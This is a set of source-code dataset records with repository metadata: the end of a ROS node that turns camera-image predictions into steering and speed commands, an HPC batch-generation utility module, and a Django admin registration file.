        resized = edges.astype(np.float32) #resized.astype(np.float32)
        # resized = np.clip(resized + np.mean(resized), 0, 1)
        # print(np.mean(np.clip(resized + np.mean(resized), 0, 1)))
        resized = (resized) * 255 #/ 255
        # print(np.max(resized))
        self.add_frame(resized)
        # self.filter.add_prediction(command)
        # filtered_command = self.filter.get_filtered_prediction()
        # command = filtered_command
        command = None
        current_time = rospy.get_time()
        # Query the network at most every 0.3 s; between queries the last
        # steering value keeps being published.
        if current_time - self.last_command_time > 0.3:
            command = self.predict()
            if command is None:
                command = self.prev_command
            # print(current_time - self.last_command_time)
            self.last_command_time = current_time
            # Map class {0,1,2} to steering angle {180,90,0}.
            self.current_steering = 90 *(2 -command)#(2 - command)#(self.filter.get_filtered_prediction())# self.filter.get_filtered_prediction())
        # if self.prev_command != self.current_steering:
        #     steering_now = 90*(2 - self.prev_command)
        print self.current_steering
        # print(current_time)
        self.pubSpeed.publish(self.current_speed)
        self.pubSteering.publish(self.current_steering)
        if command is None:
            command = self.prev_command
        self.prev_command = command
        #global COUNT
        #cv2.imwrite('real_ims/' + str(COUNT) + '.png', res)
        #COUNT += 1
        cv2.imshow('edges',255 *edges)
        # cv2.imshow('resized',cv2.putText(cv2.resize(resized, (frame.shape[1], frame.shape[0])), str(command), (10, len(res[0])//2), cv2.FONT_HERSHEY_SIMPLEX, 3, 255))
        # cv2.imshow('frame',cv2.putText(frame, str(command), (10, len(res[0])//2), cv2.FONT_HERSHEY_SIMPLEX, 3, 255))
        # cv2.imshow('hist',hist_im)
        cv2.waitKey(1)
# Instantiate the node: this registers the camera subscriber and starts
# publishing speed/steering commands from the image callback.
ic = image_converter()
try:
    # Hand control to ROS; callbacks run until shutdown or Ctrl-C.
    rospy.spin()
except KeyboardInterrupt:
    print("Shutting down")
cv2.destroyAllWindows()
#600/400 -> 35.3/23.5
# 45/ 18/ 17 cm
# 2.65/1.05/1
#Un 7/5/5
#Un 7/5/5 | [
"alb.atlasov@gmail.com"
] | alb.atlasov@gmail.com |
749d2c1a1aec1821efb6595ac36154a2c3c7d7d3 | 1ee36eb16394cd5a96173597e6f76adb1e2c1e11 | /batchgen/util.py | 74a3fb9636d37456ffe39f86e7b322d0f1c990f0 | [
"MIT"
] | permissive | UtrechtUniversity/hpc-batch-gen | 94a93903f9b3e2b4e8f6c4feefdb6aca2baf1384 | 414383de8d95e140c513de48abfe4a47f4bcbe9b | refs/heads/master | 2020-04-25T15:22:18.402545 | 2019-04-26T10:57:31 | 2019-04-26T10:57:31 | 172,876,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | '''
Some helpful functions.
@author: Raoul Schram
'''
import os
import re
def _read_file(script):
""" Function to load either a script file or list.
Arguments
---------
script: str/str
Either a file to read, or a list of strings to use.
Returns
-------
List of strings where each element is one command.
"""
if script is None:
return ""
with open(script, "r") as f:
script_string = f.read()
return script_string
def _split_commands(script):
""" Split commands from a string into a list of commands.
Arguments
---------
script: str
Command as read directly from a file.
Returns
-------
str:
List of commands, lines with only whitespce removed,
and also lines starting with #.
"""
real_commands = []
for line in script.split("\n"):
only_whitespace = re.match(r"\A\s*\Z", line) is not None
sw_hash = re.match(r"^#", line) is not None
if only_whitespace or sw_hash:
continue
real_commands.append(line)
return real_commands
def _check_files(*args):
""" Check if files exist.
Arguments
---------
args: str
List of files to check.
Returns
-------
int:
Number of non-existing files.
"""
n_error = 0
for filename in args:
if filename is None:
continue
if not os.path.isfile(filename) and filename != "/dev/null":
print("Error: file {file} does not exist.".format(file=filename))
n_error += 1
return n_error
def batch_dir(backend, job_name, remote=False):
    """Return the absolute batch directory for a backend/job pair.

    The directory is "batch.<backend>/<job_name>", with a ".remote"
    suffix on the backend part when *remote* is true.
    """
    suffix = ".remote" if remote else ""
    base = "batch." + backend + suffix
    return os.path.abspath(os.path.join(base, job_name))
def mult_time(clock_wall_time, mult):
    """Multiply a time delta in hh:mm:ss format by an integer multiplier.

    Arguments
    ---------
    clock_wall_time: str
        Time delta in hh:mm:ss format.
    mult:
        Integer multiplier for the time.

    Returns
    -------
    str:
        The multiplied time delta in hh:mm:ss format (hours may exceed 24
        and are not wrapped).
    """
    hours, minutes, seconds = (int(part) for part in clock_wall_time.split(":"))
    # Work in total seconds, then carry back up with divmod.
    total_seconds = (hours * 3600 + minutes * 60 + seconds) * mult
    out_minutes, out_seconds = divmod(total_seconds, 60)
    out_hours, out_minutes = divmod(out_minutes, 60)
    return "{hh:02d}:{mm:02d}:{ss:02d}".format(hh=out_hours, mm=out_minutes,
                                               ss=out_seconds)
| [
"r.d.schram@uu.nl"
] | r.d.schram@uu.nl |
31f3935d3cda0bac22f397e9b82b4a7d882bc3ca | 80f6c09fc186102766929c5f3c4e35190b2825f0 | /app/admin.py | d00f7f16790dad1ce789ef29494c0b0934054f96 | [] | no_license | BibekDas619/E_commerce-website | fa07ff073d7a9be190ef9c7b97e02cfdf52a6dcd | b5a44611863cbbea482e48eb9794e93b3d628ccd | refs/heads/master | 2023-03-14T23:25:37.828550 | 2021-03-11T04:28:42 | 2021-03-11T04:28:42 | 346,576,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from django.contrib import admin
# Register your models here.
from django.contrib import admin
from app.models import Product,Contact,Order,CustomUser
# Register your models here.
admin.site.register(Contact)
admin.site.register(Product)
admin.site.register(Order)
admin.site.register(CustomUser) | [
"bibekdas993@gmail.com"
] | bibekdas993@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.